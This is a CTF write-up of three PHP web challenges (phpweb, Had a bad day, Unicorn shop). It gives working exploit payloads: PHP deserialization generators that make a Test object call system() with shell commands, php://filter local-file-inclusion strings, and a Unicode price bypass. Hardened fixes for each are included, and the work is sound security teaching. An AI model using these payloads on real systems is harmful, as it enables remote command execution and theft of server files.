网鼎杯2020 phpweb

The page refreshes itself every so often, and there is also a warning at the top:

```
Warning: date(): It is not safe to rely on the system's timezone settings. You are *required* to use the date.timezone setting or the date_default_timezone_set() function. In case you used any of those methods and you are still getting this warning, you most likely misspelled the timezone identifier. We selected the timezone 'UTC' for now, but please set date.timezone to select your timezone. in /var/www/html/index.php on line 24
2021-08-20 07:59:52 am
```

So there is a `date` function being called. Capture the refresh request and see what it sends:

[screenshot]

Try changing it:

[screenshot]

Blocked. Use `func=readfile&p=index.php` to read the source instead:

```php
<?php
// Denylist of function names (the challenge's own list, reproduced as-is;
// note the typo "registregister_shutdown_function" and that "unserialize" is absent)
$disable_fun = array("exec","shell_exec","system","passthru","proc_open","show_source","phpinfo","popen","dl","eval","proc_terminate","touch","escapeshellcmd","escapeshellarg","assert","substr_replace","call_user_func_array","call_user_func","array_filter", "array_walk", "array_map","registregister_shutdown_function","register_tick_function","filter_var", "filter_var_array", "uasort", "uksort", "array_reduce","array_walk", "array_walk_recursive","pcntl_exec","fopen","fwrite","file_put_contents");

function gettime($func, $p) {
    $result = call_user_func($func, $p);
    $a = gettype($result);
    if ($a == "string") {
        return $result;
    } else {
        return "";
    }
}

class Test {
    var $p = "Y-m-d h:i:s a";
    var $func = "date";
    function __destruct() {
        // Calls gettime() directly: the denylist check below is never applied here
        if ($this->func != "") {
            echo gettime($this->func, $this->p);
        }
    }
}

$func = $_REQUEST["func"];
$p = $_REQUEST["p"];
if ($func != null) {
    $func = strtolower($func); // convert all characters to lowercase
    if (!in_array($func, $disable_fun)) {
        echo gettime($func, $p);
    } else {
        die("Hacker...");
    }
}
?>
```

A lot is filtered and I had no ideas. Watching a more experienced player, the route is deserialization: `unserialize` is not on the denylist, and `Test::__destruct()` calls `gettime($this->func, $this->p)` directly, so the `func`/`p` of a deserialized `Test` object never pass through the `in_array` check. Send `func=unserialize` with a serialized `Test` as `p`:

[screenshot]

`ls` didn't find a flag, `grep` found nothing either, and there were no suspicious files, so use `find / -name flag*`:

[screenshot]

```php
<?php
error_reporting(0);
// Payload generator: only the property values matter to serialize();
// the destructor body is not serialized (and gettime() is not defined locally).
class Test {
    var $p = "find / -name flag*";
    var $func = "system";
    function __destruct() {
        if ($this->func != "") {
            echo gettime($this->func, $this->p);
        }
    }
}
$a = new Test();
echo serialize($a);
?>
```

A suspicious file turned up under `/tmp`. Try reading it: `readfile` doesn't work, so the only way is to build another deserialization payload that reads it.

```php
<?php
error_reporting(0);
// Same generator, with the command swapped for reading the file found under /tmp
class Test {
    var $p = "cat /tmp/flagoefiu4r93";
    var $func = "system";
    function __destruct() {
        if ($this->func != "") {
            echo gettime($this->func, $this->p);
        }
    }
}
$a = new Test();
echo serialize($a);
?>
```
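For the defender's side of this challenge, here is an added example (my own code, not the challenge's or the writeup's) of a hardened dispatcher. The two weaknesses above were a denylist that did not include `unserialize`, and a destructor that reached `call_user_func()` without any check. The fix enforces an allowlist inside `gettime()` itself, so every caller, destructors included, is covered. The function names in `ALLOWED_FUNCS` are an assumption about what the page actually needs.

```php
<?php
// Added example: hardened version of the phpweb dispatcher (not the challenge code).
// Allowlist instead of denylist, enforced inside gettime() so that a deserialized
// Test object cannot reach call_user_func() with an arbitrary function name.
declare(strict_types=1);

// Assumption: the only functions the page legitimately calls
const ALLOWED_FUNCS = ['date', 'strtoupper'];

final class NotAllowed extends RuntimeException {}

function gettime(string $func, string $p): string
{
    $func = strtolower($func);
    // strict comparison: no type juggling between "0" and a function name
    if (!in_array($func, ALLOWED_FUNCS, true)) {
        throw new NotAllowed("function not allowed: $func");
    }
    $result = call_user_func($func, $p);
    return is_string($result) ? $result : '';
}

final class Test
{
    public string $p = 'Y-m-d h:i:s a';
    public string $func = 'date';

    public function __destruct()
    {
        // Same shape as the original, but gettime() now refuses anything off the
        // allowlist, so Test{func:"system"} yields NotAllowed rather than a shell.
        if ($this->func !== '') {
            try {
                echo gettime($this->func, $this->p);
            } catch (NotAllowed $e) {
                // a destructor must not leak details; log server-side instead
                error_log('rejected destructor call: ' . $e->getMessage());
            }
        }
    }
}

/** Handle one request and return the body (returned, not echoed, so it is testable). */
function handle(array $request): string
{
    $func = (string)($request['func'] ?? '');
    $p    = (string)($request['p'] ?? '');
    if ($func === '') {
        return '';
    }
    try {
        return gettime($func, $p);
    } catch (NotAllowed $e) {
        return 'Hacker...';
    }
}

// Demo on constructed inputs (php hardened.php)
echo handle(['func' => 'date', 'p' => 'Y-m-d']), PHP_EOL;                 // today's date
echo handle(['func' => 'readfile', 'p' => 'index.php']), PHP_EOL;        // Hacker...
echo handle(['func' => 'unserialize',
             'p' => 'O:4:"Test":2:{s:1:"p";s:2:"id";s:4:"func";s:6:"system";}']), PHP_EOL; // Hacker...
```

If the application must call `unserialize()` on external data anywhere, pass `['allowed_classes' => false]` as its second argument so no object with a destructor can be instantiated from that input at all.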

[BSidesCF 2020]Had a bad day

This looks like file inclusion; the error message confirms it:

```
Warning: include(woofers'.php): failed to open stream: No such file or directory in /var/www/html/index.php
Warning: include(): Failed opening 'woofers'.php' for inclusion (include_path='.:/usr/local/lib/php') in /var/www/html/index.php
```

It is file inclusion, but an `open_basedir` bypass may be needed. Try the `php://filter` wrapper to read `index.php`:

```
?category=php://filter/convert.base64-encode/resource=index
```
```php
<?php
$file = $_GET['category'];
if (isset($file))
{
    if (strpos($file, "woofers") !== false || strpos($file, "meowers") !== false || strpos($file, "index")) {
        include ($file . '.php');
    }
    else {
        echo "Sorry, we currently only support woofers and meowers.";
    }
}
?>
```

Only one of the OR conditions has to hold for execution to reach the `include`. But if `woofers` or `meowers` appears in the path, the file we actually want can't be read, so here is a new trick:

```
?category=php://filter/convert.base64-encode/woofers/resource=flag
```

Built this way, the extra `woofers` segment satisfies the substring check without stopping the file from being read: `php://filter` treats it as a filter name, emits a warning that the filter cannot be located, and still opens the resource.
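As an added example (my own code, not the challenge's), here is how the include should have been written. The root cause was a substring check combined with passing the whole user string to `include()`; an allowlist map keyed on the exact category name removes both. The two category file names are an assumption about the site.

```php
<?php
// Added example: hardened replacement for the category include (not the challenge code).
// The parameter is used only as a key into a fixed map; user input never becomes
// part of a filesystem path or a stream wrapper.
declare(strict_types=1);

// Assumption: these are the only legitimate category pages
const CATEGORY_PAGES = [
    'woofers' => 'woofers.php',
    'meowers' => 'meowers.php',
];

/** Resolve a category name to a path under $baseDir, or null if it is not allowed. */
function resolve_category(?string $category, string $baseDir): ?string
{
    if ($category === null) {
        return null;
    }
    // exact key match: no substrings, no php:// wrappers, no traversal
    if (!array_key_exists($category, CATEGORY_PAGES)) {
        return null;
    }
    return $baseDir . DIRECTORY_SEPARATOR . CATEGORY_PAGES[$category];
}

/** Same control flow as the original page, with the allowlisted resolver. */
function serve_category(?string $category, string $baseDir): void
{
    $path = resolve_category($category, $baseDir);
    if ($path === null) {
        echo "Sorry, we currently only support woofers and meowers.";
        return;
    }
    include $path;
}

// Demo on constructed inputs, including the payloads from the writeup:
// only the exact name "woofers" resolves; everything else is null.
foreach ([
    'woofers',
    'php://filter/convert.base64-encode/resource=index',
    'php://filter/convert.base64-encode/woofers/resource=flag',
    '../../etc/passwd',
] as $input) {
    var_dump(resolve_category($input, __DIR__));
}
```

Note that `strpos($file, "index")` in the original is not even compared with `!== false`, so a name starting with `index` (position 0) fails that branch while `xindex` passes; a map lookup has none of these edge cases.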

[ASIS 2019]Unicorn shop

[screenshot]

`id=1&price=9`: ids 1, 2 and 3 all report a wrong item, and for 4 there isn't enough money.

The point of this challenge is Unicode encoding security: using Unicode, find a character whose Unicode value is greater than 1337 and enter it.

https://www.compart.com/en/unicode/

This site has a very complete list of Unicode characters. I found the character ↂ, whose Unicode value is greater than 1337. Submit 4 and ↂ again. Entering 亿 directly also works.
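To show why a single character like ↂ (U+2182, ROMAN NUMERAL TEN THOUSAND, numeric value 10000) can pass a price check, here is an added example of my own, not the challenge's backend code, which the writeup does not show. It assumes the shop converted the submitted price with a Unicode-aware numeric conversion; the lenient parser below reproduces that behaviour with PHP's `IntlChar` (requires the `intl` extension, also an assumption), and the strict parser beside it accepts ASCII digits only.

```php
<?php
// Added example: weak vs. strict price parsing (not the challenge's code).
declare(strict_types=1);

/**
 * Lenient parser mimicking the failure mode: a single character is accepted
 * if Unicode assigns it a numeric value. ↂ -> 10000.0, fullwidth ９ -> 9.0.
 * Assumes the intl extension is available for IntlChar.
 */
function lenient_price(string $s): ?float
{
    if (is_numeric($s)) {
        return (float)$s;
    }
    if (class_exists('IntlChar') && mb_strlen($s, 'UTF-8') === 1) {
        $v = IntlChar::getNumericValue($s);
        return $v === IntlChar::NO_NUMERIC_VALUE ? null : (float)$v;
    }
    return null;
}

/**
 * Strict parser: ASCII digits with an optional two-place decimal part and
 * nothing else. \d without the /u flag matches only 0-9, and the D modifier
 * stops $ from accepting a trailing newline.
 */
function strict_price(string $s): ?float
{
    if (preg_match('/^\d{1,9}(\.\d{1,2})?$/D', $s) !== 1) {
        return null;
    }
    return (float)$s;
}

/** Purchase check against a server-side listed price, using the strict parser. */
function can_buy(string $submittedPrice, float $listedPrice): bool
{
    $p = strict_price($submittedPrice);
    return $p !== null && $p >= $listedPrice;
}

// Demo on constructed inputs
foreach (['9', '1337', 'ↂ', '1e9', '９'] as $in) {
    printf("%s\tlenient=%s\tstrict=%s\n", $in,
        var_export(lenient_price($in), true), var_export(strict_price($in), true));
}
var_dump(can_buy('ↂ', 1337.0));    // bool(false)
var_dump(can_buy('1337', 1337.0)); // bool(true)
```

The broader lesson: any parser that consults Unicode numeric properties (Python's `unicodedata.numeric`, ICU's `u_getNumericValue`, and friends) will treat dozens of non-digit code points as numbers, so price and quantity fields should be validated against an explicit ASCII pattern before conversion, and the price itself should come from the server's own catalogue rather than the request.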